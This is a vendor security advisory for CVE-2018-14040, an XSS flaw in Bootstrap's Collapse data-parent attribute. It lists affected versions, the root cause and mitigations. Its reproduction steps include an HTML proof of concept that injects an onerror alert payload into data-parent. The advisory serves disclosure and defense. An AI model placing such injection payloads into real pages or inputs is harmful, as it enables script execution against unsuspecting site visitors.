CVE-2018-14040

Cross-Site Scripting
Affects
Bootstrap
in
Bootstrap
No items found.
Versions
>=2.3.0 <=2.3.2, >=3.0.0-rc1 <3.4.0, >=4.0.0-alpha <4.1.2
Exclamation circle icon
Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

Overview

Bootstrap is an HTML, CSS, and JS framework for developing responsive, mobile-first web sites and applications.

A cross-site scripting (XSS) vulnerability (CVE-2018-14040) has been identified within the Bootstrap 2 Collapse component.

Per OWASP: Cross-Site Scripting attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. An attacker can use XSS to send a malicious script to an unsuspecting user.

Details

Module Info

Vulnerability Info

The Medium-severity vulnerability is a result of improper handling of the data-parent attribute, which could allow an attacker to inject malicious JavaScript code.

The data-parent attribute is used to reference the ancestor container for collapsible elements. The affected code directly assigns the raw value of this.options.parent to this.$parent, trusting the input without validation or sanitization, leading to potential XSS attacks.

Steps To Reproduce

  • Create an HTML page that is set up to use Bootstrap v2 and create an accordion component.
  • Change one of the data-parent attributes to contain the following value: <img src='1' onerror='alert(1)' />
  • Click the “data-parent XSS Example” link to fire the XSS.
  • Example:
<div class="accordion" id="accordion">
  <div class="accordion-group">
    <div class="accordion-heading">
      <a
        class="accordion-toggle"
        data-toggle="collapse"
        data-parent="#accordion"
        href="#collapseOne"
      >
        Collapsible Group Item #1
      </a>
    </div>
    <div id="collapseOne" class="accordion-body collapse in">
      <div class="accordion-inner">Anim pariatur cliche...</div>
    </div>
  </div>
  <div class="accordion-group">
    <div class="accordion-heading">
      <a
        class="accordion-toggle"
        data-toggle="collapse"
        data-parent="<img src='1' onerror='alert(1)' />"
        href="#collapseTwo"
      >
        'data-parent' XSS Example
      </a>
    </div>
    <div id="collapseTwo" class="accordion-body collapse">
      <div class="accordion-inner">Anim pariatur cliche...</div>
    </div>
  </div>
</div>

Mitigation

The Bootstrap 2 version is End-of-Life and will not receive any updates to address this issue. For more information see here.

Users of the affected components should apply one of the following mitigations:

  • Migrate affected applications to a supported version of Bootstrap.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Credits

  • 1Jesper1 (finder)
Vulnerability Details
ID
CVE-2018-14040
PROJECT Affected
Bootstrap
Versions Affected
>=2.3.0 <=2.3.2, >=3.0.0-rc1 <3.4.0, >=4.0.0-alpha <4.1.2
Published date
February 28, 2025
≈ Fix date
February 28, 2025
Severity
Level
CVSS Assessment
Low
>=0 <4
Medium
>=4 <6
High
>=6 <8
Critical
>=8 <10
Medium
Category
Cross-Site Scripting
Sign up for the latest vulnerability alerts fixed in
NES for Bootstrap
Rss feed icon
Subscribe via RSS
or

By clicking “submit” I acknowledge receipt of our Privacy Policy.

Thanks for signing up for our Newsletter! We look forward to connecting with you.
Oops! Something went wrong while submitting the form.